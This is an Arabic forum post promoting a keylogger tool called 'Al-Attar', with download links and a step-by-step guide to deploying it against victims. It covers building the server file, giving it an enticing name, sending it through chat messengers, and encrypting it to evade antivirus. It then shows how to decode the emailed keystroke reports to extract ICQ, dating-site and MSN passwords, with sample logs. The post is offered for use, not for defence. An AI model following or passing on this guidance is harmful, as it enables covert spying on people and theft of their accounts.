هـــمســــه حــــــــب
اهلا وسلا بكم فى منتادك همسه حب

انضم إلى المنتدى ، فالأمر سريع وسهل

هـــمســــه حــــــــب
اهلا وسلا بكم فى منتادك همسه حب
هـــمســــه حــــــــب
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

سرقه اميل عن طريق اكواد

اذهب الى الأسفل

سرقه اميل  عن طريق اكواد  Empty سرقه اميل عن طريق اكواد

مُساهمة من طرف تامر الكردى الإثنين يونيو 20, 2011 1:53 pm

اسم البرنامج :العطار (عربي )
الحجم : kb 241
التحميل :
http://www.alattar.s5.com/attar.zip
او من هنا : http://www.h4palestine.com/download/attar.zip

الشرح :
افتح البرنامج ووو......شاهد الصور مع انها ما تحتاج لشرح

سرقه اميل  عن طريق اكواد  Pas9


سرقه اميل  عن طريق اكواد  Pas10


سرقه اميل  عن طريق اكواد  Pas11
بعد صنع السيرفر راح تلقاه في سطح المكتب باسم RUNME
الان ستقوم بارساله الى الضحية قم بتغيير اسم الملف الى اى اسم مغرى وتقوم بارساله للضحية من خلال برامج الدردشة مثل
MSN MESSENGER او YAHOO MESSENGER او odigo او mirc
وهذا افضل من ارساله عن طريق الايميل لانه عالبا ما يفشل لان معظم سيرفرات
الايميل لها انظمة حماية قوية يمكنها كشف السيرفر ولان هذه الطريقة تكون
غير مقنعة للضحايا من جهة اخرى
يمكن للهاكر المحترفين ان يقوموا فبل ارسال السيرفر بضعطه حتى تقل مساحته او تشفيره حتى لا يكشفه الانتى فيرس
بعد ارسال الباتش كده انتهت مهمتك ولن يبقى سوى ان تتابع التقارير التى يرسلها السيرفرالى ايميلك من جهاز الضحية

التعامل مع التقارير الواردة :
+=-=-=-=-=-=-=-=+
التقارير او الرسائل الى راح يرسلها لك السيرفر ترسل من agent او العميل وعنوانه
"Agent" <billgates@microsoft.com>
اليك انت والذى تعتبر الرئيس

boss Boss" <president@whitehouse.gov>
وعنوانها Keyboard report from workstation 123.
اى تقرير المفاتيح التى استخدمها الضحية فهو عميل او جاسوس يعمل لحسابك فى جهاز الضحية دون علمه

يبدا التقرير بالاتى
اسم مستخدم الويندوز Windows user : Intel
رقم مسلسل التقرير Message number : 0012
البداية Startup
النهاية THE END

هذا التقرير يشتمل على ما يستخدمه الضحية من مفاتيح الكى بورد وبالتالى ما ستخدمه من برامج
وما دخله من مواقع وما يكتبه عند تسجيل الدخول فى المواقع والبرامج المحتلفة اى كلمات السر
والفت نظركم الى عدة ملاحظات هامة

Windows user : A
Message number : 0071
Startup.

[RSHIFT][ALT]jpdhjd g;l[ENTER][RSHIFT]ho,;l[ENTER]hg{kvhg

هذا البرنامج فى غاية الحساسية وهذا يميزه عن برامج اخرى جربتها قد يسقط منها بعض الحرووف التى كتبها الضحية سهوا
ولكن عند ضغط الضحية على المفتاح بشدة او لفترة طويلة قد يكرر الحرف للعديد من المرات وهذا يسهل ملاحظته

اذا كان الضحية يكتب بالعربى فراح تلاقى الحرووف غير متناسقة مثلا: v,lhksd
لو تحب تترجمها اكتبها فى المفكرة بعد التحول للغة العربية بنفس الترتييب تلاقيها: رومانسي

احيانا بعض المفاتيح ( وهى مفاتيح الوظائف ) تكتب باسمائها وليست كالرموز مثلا
[BCK] و [del] و [TAB] و [CTL] و [NUM]

ايضا الارقام التى يكتبها الضحية احيانا تكتب بطريقة مختلفة مثل الموجودة على يمين الكى بورد
0 = [INS]
1 = [END]
2 = [DN]
3 = [PGDN]
4 = [<-]
5 = e
6 = [->]
7 = [HOME]
8 = [UP]
9 = [PGup]

اما عن معرفة الباسورد
فمثلا اذا وجدت مثل هذا فى الرسالة فيعنى ان باسورد الا icq هى 300132776
@@ ICQ Registration @@
300132776

واذا وجدت هذا فاليوزر نيم لموقع cubid هو hiroman والباسورد w75ghu
@@ Welcome to Cupid - Microsoft Internet Explorer @@
hironman[ENTER][ENTER]
@@ Welcome to Cupid - Microsoft Internet Explorer @@
[ALT][LSHIFT]w75ghu,

اما الميسنجر وهو الاهم فالباسورد snowwhitelove123456
@@ Sign in to .NET Messenger Service - MSN Messenger @@
snowwhiteinlove[END][DN][PGDN][<-]e[->][ENTER]

غالبا ما تكون اول 3 او 4 رسائل كافية لمعرفة جميع باسوردات الضحية وقد لا
تحتاج الباقون الا اذا كنت ترغب فى مراقبةالضحية بدقة وباستمرار
لذا فقد يزيد عدد الرسائل مما قد يسبب ازعاجا لك لذلك فانصح باستخدام خاصية ال JUNK MAIL
او الافضل على الاطلاق هو استخدام برنامج الاوت لوك اكبريس لتنقل اليه هذه الرسائل وتفحصها بدقة وانت غير متصل بالانترنت

اهم المزايا والعيوب :
======
واهم ميزات البرنامج انه يمكن من خلال التقارير الواردة معرفة جميع الباسوردات لدى الضحية
حتى الغير مخزنة بالجهاز وهذا ما تعجز عنه جميع برامج الاختراق الاخرى

ويعيبه ان السيرفر يكتشفه الانتى فيرس (ولكن يمكن تشفيره)
كما انه يعمل فى الخلفية اى بالضغط على CTL+ALT+DEL يظهر البرنامج ضمن البرامج العاملة حاليا
وبالتالى قد يكتشفه الضحية ان كان على درجة فائقة من الذكاء وهذا لا يحدث لانه لو كان كذلك لما تم اختراقه من البداية
تامر الكردى
تامر الكردى
صاحب المنتدى
صاحب المنتدى

نقاط : 1048633
تقيم : 0
تاريخ التسجيل : 02/06/2011

https://hamset-7ob.hooxs.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

الرجوع الى أعلى الصفحة

- مواضيع مماثلة

 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى